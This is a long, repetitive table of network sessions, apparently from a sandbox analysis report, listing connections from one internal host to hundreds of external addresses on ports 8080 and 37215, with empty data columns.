                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33366192.168.2.235443494.249.153.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33367192.168.2.234418883.132.182.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33368192.168.2.2347366121.62.72.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33369192.168.2.233439414.49.171.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33370192.168.2.2358628146.95.149.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33371192.168.2.2339098152.67.123.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33372192.168.2.233544699.224.221.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33373192.168.2.2333242105.210.85.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33374192.168.2.235725412.18.244.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33375192.168.2.2340910171.147.230.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33376192.168.2.2350830135.206.65.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33377192.168.2.2338644175.83.126.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33378192.168.2.2357282162.150.66.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33379192.168.2.2346028220.14.226.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33380192.168.2.234559678.43.74.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33381192.168.2.2352080144.172.167.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33382192.168.2.2343952211.79.231.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33383192.168.2.2339358157.249.72.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33384192.168.2.236055041.71.132.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33385192.168.2.233618441.132.183.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33386192.168.2.235082041.59.232.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33387192.168.2.234521441.233.134.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33388192.168.2.2334368135.240.119.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33389192.168.2.235362241.228.188.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33390192.168.2.233584441.32.97.15737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33391192.168.2.2343648157.218.37.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33392192.168.2.235260641.155.144.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33393192.168.2.2351692157.152.28.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33394192.168.2.2343874152.244.197.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33395192.168.2.233596447.120.185.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33396192.168.2.235918875.231.21.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33397192.168.2.233422862.217.47.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33398192.168.2.235837267.80.32.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33399192.168.2.2359566185.116.104.2038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33400192.168.2.233958086.157.43.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33401192.168.2.2342376132.97.26.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33402192.168.2.2358158105.81.119.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33403192.168.2.2345798181.223.147.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33404192.168.2.234506632.53.195.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33405192.168.2.2332934131.129.140.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33406192.168.2.2339206206.117.210.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33407192.168.2.2343248221.53.49.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33408192.168.2.234675898.170.142.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33409192.168.2.235218086.18.145.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33410192.168.2.235944676.45.205.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33411192.168.2.2335488131.122.247.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33412192.168.2.2342092136.177.212.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33413192.168.2.2342926137.186.150.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33414192.168.2.2338082104.126.186.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33415192.168.2.23503108.99.225.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33416192.168.2.2334346112.213.221.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33417192.168.2.2360214166.179.230.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33418192.168.2.2352292183.36.197.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33419192.168.2.235580859.117.135.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33420192.168.2.2354996194.11.17.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33421192.168.2.235448687.63.68.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33422192.168.2.234082057.17.35.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33423192.168.2.235822219.151.225.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33424192.168.2.2356894140.170.156.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33425192.168.2.236059435.97.242.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33426192.168.2.2341692221.137.123.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33427192.168.2.233880647.76.165.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33428192.168.2.2345188155.142.36.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33429192.168.2.2346780137.17.63.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33430192.168.2.233411687.55.144.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33431192.168.2.233963872.167.209.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33432192.168.2.2355880150.212.117.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33433192.168.2.235562692.142.24.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33434192.168.2.233550650.134.255.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33435192.168.2.234266650.146.236.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33436192.168.2.236002636.48.215.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33437192.168.2.2349376203.41.211.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33438192.168.2.2339606220.147.42.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33439192.168.2.235975282.234.48.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33440192.168.2.2351014186.129.226.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33441192.168.2.2358388115.37.235.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33442192.168.2.2340164140.147.246.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33443192.168.2.2358650188.180.159.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33444192.168.2.2350034138.171.46.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33445192.168.2.2338562182.189.74.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33446192.168.2.235621612.39.86.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33447192.168.2.2333424221.82.209.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33448192.168.2.2343168192.164.11.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33449192.168.2.234619239.193.184.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33450192.168.2.2335062164.133.0.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33451192.168.2.2344834191.27.91.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33452192.168.2.2349030110.74.69.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33453192.168.2.233642679.186.232.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33454192.168.2.2337776204.179.45.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33455192.168.2.2336162173.14.98.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33456192.168.2.235736640.26.31.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33457192.168.2.2357804148.141.14.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33458192.168.2.2350494183.128.241.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33459192.168.2.235007420.253.25.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33460192.168.2.2342712104.62.104.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33461192.168.2.2336902112.180.45.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33462192.168.2.2346038100.1.252.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33463192.168.2.2354856205.14.157.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33464192.168.2.2350190208.233.18.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33465192.168.2.235355092.88.165.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33466192.168.2.233789688.102.107.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33467192.168.2.2335962122.40.90.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33468192.168.2.235186269.182.79.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33469192.168.2.2342946169.233.116.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33470192.168.2.235697012.50.249.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33471192.168.2.2350938174.62.162.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33472192.168.2.2358202169.243.189.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33473192.168.2.234875258.47.75.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33474192.168.2.233426460.130.166.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33475192.168.2.2340130165.247.152.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33476192.168.2.23549402.137.189.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33477192.168.2.234454220.195.217.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33478192.168.2.2354936131.25.181.1548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33479192.168.2.2338028168.10.135.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33480192.168.2.2345840210.26.115.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33481192.168.2.2355204170.210.95.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33482192.168.2.2346112181.160.148.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33483192.168.2.2343164163.189.203.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33484192.168.2.2344626208.154.8.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33485192.168.2.233941692.56.255.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33486192.168.2.2351182129.109.96.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33487192.168.2.2360552156.55.57.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33488192.168.2.2349618220.172.91.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33489192.168.2.2354358111.22.59.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33490192.168.2.233373665.188.171.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33491192.168.2.233402099.82.133.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33492192.168.2.234350468.202.0.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33493192.168.2.2332894153.212.121.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33494192.168.2.236075099.109.253.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33495192.168.2.2345290194.242.66.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33496192.168.2.2342692146.124.139.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33497192.168.2.2333454207.182.180.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33498192.168.2.233636834.116.243.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33499192.168.2.2340782120.49.209.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33500192.168.2.2342330134.23.156.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33501192.168.2.2354482109.142.254.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33502192.168.2.2351846211.176.74.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33503192.168.2.234552040.38.32.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33504192.168.2.234699699.25.103.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33505192.168.2.235689832.42.15.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33506192.168.2.2347076149.174.82.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33507192.168.2.2339500144.228.146.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33508192.168.2.234568435.175.166.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33509192.168.2.2347586100.134.52.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33510192.168.2.2348310107.190.160.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33511192.168.2.23342481.231.82.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33512192.168.2.233827859.186.87.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33513192.168.2.23519385.166.76.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33514192.168.2.236076071.189.230.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33515192.168.2.2340080188.112.237.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33516192.168.2.234391242.220.110.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33517192.168.2.235039487.109.40.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33518192.168.2.2334508171.158.3.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33519192.168.2.235642091.62.37.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33520192.168.2.2350986158.163.51.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33521192.168.2.235868463.141.182.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33522192.168.2.2338156139.141.104.2558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33523192.168.2.2348784185.235.73.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33524192.168.2.235239280.128.196.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33525192.168.2.2334650129.200.33.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33526192.168.2.235277887.179.219.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33527192.168.2.2332974188.33.11.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33528192.168.2.2350852200.145.97.178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33529192.168.2.2360150135.121.161.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33530192.168.2.234465827.178.31.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33531192.168.2.234077295.111.181.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33532192.168.2.233731484.111.164.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33533192.168.2.2334578139.207.241.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33534192.168.2.234891019.212.192.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33535192.168.2.233526861.195.169.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33536192.168.2.2340220192.151.120.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33537192.168.2.235331471.164.151.2008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33538192.168.2.235924473.221.228.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33539192.168.2.235862480.209.5.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33540192.168.2.2353734183.130.134.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33541192.168.2.235722218.39.121.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33542192.168.2.234258450.57.91.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33543192.168.2.235737666.122.33.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33544192.168.2.2336088138.39.144.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33545192.168.2.2351390203.69.245.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33546192.168.2.235808876.153.5.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33547192.168.2.234435496.100.23.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33548192.168.2.2352276201.104.1.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33549192.168.2.235707236.218.87.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33550192.168.2.235299687.111.198.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33551192.168.2.2349148210.12.209.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33552192.168.2.2339178151.166.48.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33553192.168.2.235731439.219.141.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33554192.168.2.2338708208.158.100.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33555192.168.2.2335440128.18.102.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33556192.168.2.2360400157.107.67.14237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33557192.168.2.2348864197.203.242.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33558192.168.2.234151624.93.201.10137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33559192.168.2.2355374197.144.164.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33560192.168.2.234830641.16.149.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33561192.168.2.2342160197.45.20.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33562192.168.2.2336088157.68.178.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33563192.168.2.235461241.220.35.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33564192.168.2.233498441.12.210.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33565192.168.2.233583241.45.48.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33566192.168.2.234947241.116.251.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33567192.168.2.233823841.55.47.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33568192.168.2.2359064157.228.118.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33569192.168.2.2342460197.245.41.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33570192.168.2.235168841.156.203.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33571192.168.2.2352522199.132.32.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33572192.168.2.2356840157.30.196.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33573192.168.2.233922841.124.9.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33574192.168.2.233624241.188.46.17337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        33575192.168.2.2341094137.69.128.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
